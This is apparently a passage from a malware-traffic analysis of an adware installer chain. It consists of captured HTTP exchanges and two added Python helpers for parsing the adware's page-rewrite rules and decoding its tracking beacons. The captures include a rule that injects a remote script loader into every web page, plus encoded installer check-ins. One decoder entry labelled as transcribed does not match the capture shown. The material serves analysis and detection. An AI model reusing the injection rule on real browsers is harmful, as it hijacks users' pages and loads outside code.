Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.93 ms","message":"store 4 action and 0 update "}..0..


GET /V19/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.amoninst.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 61399
Connection: keep-alive
Date: Thu, 19 Feb 2015 14:38:57 GMT
Last-Modified: Thu, 19 Feb 2015 14:37:18 GMT
ETag: "52bb6eb78bfd9436ad34be6fc97eae8c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 59352
X-Cache: Hit from cloudfront
Via: 1.1 182f7fa5c3814caf19acb317d3eb85ad.cloudfront.net (CloudFront)
X-Amz-Cf-Id: nKgID5Yc-nIdvrx0eIsp9odtdHN-L9j0CNw7KuZU3PL21uaF8Ka0aw==
//<!--
/*    Progress bar   */
var g_AmiPbs = new Array();
var g_AmiPbsEx = new Array();
var g_interval = 0;
var g_initComp = 0;
var g_possibleComps = [];
var g_reportedComps = [];
var g_removedComps = [];

function LogMessage(message) {
    try {
        g_ami.Log(message);
    }
    catch (excpt) { }
}
function IsDeclined(name) {
    var declined = 0;
    for (var i = 0; i < g_removedComps.length; i++) {
        if (g_removedComps[i] == name) {
            declined = 1;
            break;
        }
    }
    return declined;
}
function UpdateSkipStatus(sn) {
    if (g_testa && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {
        if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {
            g_ami.WriteProfileString(g_testf, '', sn, 'S');
        }
    }
}
function ShortNameFromName(name) {
    for (c = 0; c < g_comps.length; c++) {
        if (g_comps[c].name == name) {
            return g_comps[c].sn;
        }
    }
    return name;
}
function UpdateComponentsStatus() {
    LogMessage('UpdateComponentsStatus function started');
    for (var j = 0; j < g_possibleComps.length; j++) {
        var reported = 0;
        if (g_possibleComps[j].sn == 'updater') {
            continue;
        }
        for (var i = 0; i < g_reportedComps.length; i++) {
            if (g_reportedComps[i].sn == g_possibleComps[j].sn) {
                reported = 1;
                break;
            }
        }
        if

<<< skipped >>>

GET /3517/1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 23 Apr 2015 04:23:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Location: hXXp://VVV.tjepgz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip
0......



GET /files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 04:23:40 GMT
Content-Type: application/zip
Content-Length: 2211012
Last-Modified: Tue, 14 Apr 2015 08:23:03 GMT
Connection: keep-alive
ETag: "552cce67-21bcc4"
Accept-Ranges: bytes
<<< skipped (ZIP archive, 2211012 bytes; local file headers for "479.json" and "uninstallDlg2.xml" visible, compressed data not shown) >>>

<<< skipped >>>

GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.0.15</center>
</body>
</html>


GET /Bw14Po HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: goo.gl
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 23 Apr 2015 07:24:21 GMT
Location: hXXp://VVV.4threquest.me/registro/310113f8.htm
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 191
Server: GSE
Alternate-Protocol: 80:quic,p=1
<<< skipped (gzip-compressed 301 body, 191 bytes) >>>


GET /registro/top-line.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 1724
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:25 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
<<< skipped (GIF89a image data, 1724 bytes) >>>

<<< skipped >>>

GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..


GET /services/rules.txt?dummy=534 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT
ETag: "5a246f5-10-50b4a12f3b440"
Accept-Ranges: bytes
Content-Length: 16
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:37 GMT
P3P: CP="Potato"
X-Cache: BYPASS
</body>|</body>



GET /services/update.php?v=1.0.0&key=DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw&dummy=112 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
inactive..


GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:53 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.0.15</center>
</body>
</html>


GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.wpm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0..



GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.ient HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.76 ms","message":"store 1 action and 0 update "}..0..


GET /mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.14
Content-Length: 0
Connection: close
Content-Type: text/html


POST /tdownload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.downloadcrest.com
Content-Length: 106
Connection: Keep-Alive

version=1.1.2.41&s1=57a0c198e2d39f18102a94c10225f3efec999268&t1=1429774025&campid=9664&prefix=amisetup5755
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup5755__9664.exe"
Content-Type: application/x-msdownload
Date: Thu, 23 Apr 2015 07:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup5755__9664.exe
Content-Length: 1397248
Connection: keep-alive
<<< skipped (PE32 executable, 1397248 bytes: MZ/DOS stub, "Rich" header and PE header visible; section names .textbss, .text and .rdata visible; remainder not shown) >>>

<<< skipped >>>

GET /services/rules?dummy=212 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:15 GMT
Content-Type: text/plain
Content-Length: 265
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT
ETag: "5d60ef-109-50e71dec37cc0"
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:15 GMT
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</body>|<script>var cb_instID='{instID}';cbS=document.createElement("script");cbS.setAttribute("type","text/javascript");cbS.setAttribute("src", "hXXp://related.deals/services/load.js");document.body.appendChild(cbS);</script></body>
{cashReminder_instID}|{instID}

<<< skipped >>>
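The two rules bodies above (the no-op `</body>|</body>` from www.gosaferllc.com and the script-injecting pair of lines from www.related.deals) share one format: `needle|replacement`, one rule per line. The following is an added example, not code from the page and not the adware's own code; it reconstructs that format and shows what a rules file does to a page and what a detection should key on. Everything about how the client applies the rules is an assumption, since only the rule files are on the page: rules are assumed to be applied in order as literal substring replacements, and `{instID}` is assumed to be replaced with the client's install ID. URLs are kept defanged (hXXp://) exactly as the page prints them.

```python
"""Reconstruction of the `needle|replacement` rules format served by
/services/rules.txt (www.gosaferllc.com) and /services/rules
(www.related.deals) in the capture above.

Added example; not the page's code and not the adware's own code.
Assumed semantics (only the rule files themselves are on the page):
every rule line is applied, in order, as a plain substring replacement
on the HTML the client proxies, and the client substitutes its own
install ID for the `{instID}` token.
"""
import re

# Constructed from the two rules bodies in the capture above.
RELATED_DEALS_RULES = (
    "</body>|<script>var cb_instID='{instID}';"
    'cbS=document.createElement("script");'
    'cbS.setAttribute("type","text/javascript");'
    'cbS.setAttribute("src", "hXXp://related.deals/services/load.js");'
    "document.body.appendChild(cbS);</script></body>\n"
    "{cashReminder_instID}|{instID}\n"
)
GOSAFER_RULES = "</body>|</body>\n"  # replaces </body> with itself: a no-op

# Constructed page standing in for any HTML the victim's browser loads.
SAMPLE_PAGE = "<html><head><title>t</title></head><body><p>hi</p></body></html>"

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
URL_RE = re.compile(r"(?:https?|hxxps?)://[^\s\"'<>]+", re.I)


def parse_rules(text):
    """Split a rules body into [(needle, replacement)]; the first '|' separates."""
    rules = []
    for line in text.splitlines():
        if not line or "|" not in line:
            continue
        needle, replacement = line.split("|", 1)
        rules.append((needle, replacement))
    return rules


def apply_rules(html, rules, inst_id):
    """Apply each rule in order as a literal replace (assumed semantics)."""
    out = html
    for needle, replacement in rules:
        needle = needle.replace("{instID}", inst_id)
        replacement = replacement.replace("{instID}", inst_id)
        if needle:
            out = out.replace(needle, replacement)
    return out


def injected_script_sources(rules):
    """URLs a rules file pulls script from: what a detection should key on."""
    srcs = []
    for _needle, replacement in rules:
        for block in SCRIPT_RE.findall(replacement):
            srcs.extend(URL_RE.findall(block))
    return srcs


if __name__ == "__main__":
    rules = parse_rules(RELATED_DEALS_RULES)
    print(apply_rules(SAMPLE_PAGE, rules, "00000000000000000001"))
    print(injected_script_sources(rules))
```

Run against the constructed page, the related.deals rules append a remote script loader immediately before `</body>` and the gosaferllc rules leave the page untouched; `injected_script_sources` is the part worth turning into a network or proxy signature, since the rules file itself is plain text with a 600-second cache lifetime and changes without any change to the installed binary.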

GET /services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:16 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU


GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:03 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
<<< skipped (gzip-compressed chunked body, 0x57 bytes) >>>


GET /mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:07 GMT
Content-Length: 2004
hHqI6zfbRv25fbMBtZdokyLM4zjRbdf8fOBN3rshiiPI73aYRt2PU5RA75EbynCf/hrAVP
TjZ/sVutNU/EOYmASoOp pdaZ5wKogpyad0HGqCs3vKdQmjsJ0nnj /H7CXZa3IM0UzswF
w23qvDuNfofgDthQ vsg0DyM5GXUe5K6Ha8t2P1vkHrC8nCuJbzWYLg3yuMtxwyFwmSpBo
D/et5ogeEgiEXc2gbEbIbnMIkwzutXllmuuCbcbtPzY8R6ufcK CGe5TvcJoL8JrE6q5c/
1B712QyAY8/XZrZMmKM54WKXpGyVU8rDCNp7 IEGmjPe6wjHHJu2K8E4hvUznT2yuh2vLb
SmbIA0lLAnpCbil2COJtvpL8cru8Zrt0GYo3XHd4jhIIdZys4M GnQtCCNH9XrGN8e7L8k
xD MqzPYbKCsHqgs2P1nhHrdu37qL7bUZoJ0hP4p1yqQi3zgTd67IYsqyO92mEbdj1OUQO
OAcpwn/4awFT042f7NZruf8V6trUQtjumm1KRZMewNbto4pdzlzrL7xXDIoiFPaxR1vU3
kH6cvWeCQt3JP9dk0bh00jLI4heYHrC2N8spp Zl2GmhmBm/K5HlO4N3wq035GinxmGBOc
zueZgpjMt0pwiY/GPTeJDvOJVEzcgUmnOGtDLKZoS8V5ZIr6kginbLz1riSOb3U6opjq8j
3zT9pyGhJLrQd5g30vkH/g6Y02iQUdTqOZ45kqxulFP2zATTKp6zI4QwkawezEyzujHNKL
/mfcR65uEfrySW6yODedy9N4YrutxzkxXW7zjJbdfBZq5X37U522iAum2TUpqXD9dk17h6
yjnF7xjAHuytN90plKtqk3ag Uvje9bldZxmy/xo6gKF5lLUepz6OtYnz50lkV3J8HXGfp
ajY41F5PE5xGfHmSOFLJ iWcJduqwg5i2E4jOLcbG3HfZqn79xgHXauzaeK6LAYNRs0P83
zmPPwWiwR9/XesZykqhBiVPbxkuMbsWxJY1wn cI0Eu5qyGKdo/mfcJ66PkUoimZsyPfYt
yrN7VmtZdsknSEs2 ObZned6cGgLtT Uiz7y7DRtnZAZQyhpA/iy7S/RTSSIqFEsEijehm
wkOYmASoOp pdbNz3K07pySS6VCYP9D5L8Mjgftbg0rO8FfdfIOocMMamtsI2n3BkzeFOZ
0FcFQuvVnzTSZ4nLFeqCNELY9n U7i2PCsn7qLKHHZpMY3/4y1Cquz2KhT5ijfdN3l6gu
w1/LyR7ZesD/bI490f0emB6zoSTLOMu9ZcNqoaZdoWqToyPfJ57sfuo t8Vg1GycwhDxGM
LJbJFzvE5iDmppGGTWcvCD8JU Io/hjjS QjoYJWsN9oph/NH1G23sh60FKaSb4x43aoz
pCaS6VKfJNv5M8M9hoUr4FLb9W7XVYWgZ8MM1tgF2iSGuC6YOd76HtBqt7UwzW7T6WTdc
j5F7U6maJPhGLHqDeLIqvWbtRs2Os30SrBhW6xQM32adY53qtjjUXdgUvTcMW Ispm

<<< skipped >>>

GET /fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:20 GMT
Content-Length: 0



GET /ii?alpha=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 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:21 GMT
Content-Length: 84
UDRT22FabhHfFE9XbqcgVnkRz35UOxTWE1k4NYthRCBNkXYPFhbxU05kEohzT3MB2w9aHHiFfwGZVo8qEok6



POST /if?alpha=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 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache

alpha=WmVjOTkBcgl8RWo/Zl1XbAYWDRg5LjcpaHhWDQdaL0VDTHIOdQcaChhLJmM/X1REKGAneA==
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:22 GMT
Content-Length: 41
{"status":"OK","url":null,"message":null}


GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.regok HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.72 ms","message":"store 1 action and 0 update "}..0..



GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.finish HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.66 ms","message":"store 1 action and 0 update "}..0..


GET /s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..


GET /v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2105 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.82 ms","message":"store 2 action and 4 update "}..0..


GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.RegWrite HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.65 ms","message":"store 1 action and 0 update "}..0..

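The installer reports each stage of its run to xa.xingcloud.com (visit, wpm, RegWrite, ient, regok, finish, then a heartbeat and an install event from the searchprotect component), and the page lists those beacons in capture order rather than in time order. The following is an added example, not code from the page and not the installer's own code; it decodes the beacon URLs and rebuilds the timeline from the server Date headers. Two things in it are inferences from the URLs rather than documented facts: that `action`/`actionN` carry event names and `updateN` carries `key,value` profile fields, and that the uid is the system drive's model string with spaces replaced by `X` plus its serial number, which is why the sandbox appears as `VMwareXVirtualXIDEXHardXDrive_00000000000000000001` and why the operator can tell an analysis VM from a real victim.

```python
"""Decoder for the xa.xingcloud.com installer beacons in the capture above.

Added example; not the page's code and not the installer's. The
query-string grammar (action/actionN = event names, updateN = "key,value")
and the reading of the uid as "<drive model, spaces -> X>_<serial>" are
inferences from the captured URLs, not documented facts.
"""
import re
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

KEY_RE = re.compile(r"^(action|update)(\d*)$")
VM_MARKERS = ("vmware", "virtual", "vbox", "qemu")

BASE = "http://xa.xingcloud.com/v4/"
UID = "VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

# (Date header, request URL) pairs transcribed from the capture above, in
# the order the page prints them (which is not time order).
CAPTURED = [
    ("Thu, 23 Apr 2015 07:25:01 GMT", BASE + "searchprotect/" + UID
     + "?action0=xa.geoip&action1=visit&action2=install"),
    ("Thu, 23 Apr 2015 07:24:48 GMT", BASE + "sof-installer/" + UID
     + "?action=pcm.installer.istartsurf.wpm"),
    ("Thu, 23 Apr 2015 07:24:54 GMT", BASE + "sof-installer/" + UID
     + "?action=pcm.installer.istartsurf.ient"),
    ("Thu, 23 Apr 2015 07:24:03 GMT", BASE + "sof-installer/" + UID
     + "?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf"
     + "&update1=ref,pcm&update2=identifier,installer"
     + "&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en"),
    ("Thu, 23 Apr 2015 07:24:28 GMT", BASE + "sof-installer/" + UID
     + "?action=pcm.installer.istartsurf.regok"),
    ("Thu, 23 Apr 2015 07:24:30 GMT", BASE + "sof-installer/" + UID
     + "?action=pcm.installer.istartsurf.finish"),
    ("Thu, 23 Apr 2015 07:25:01 GMT", BASE + "searchprotect/" + UID
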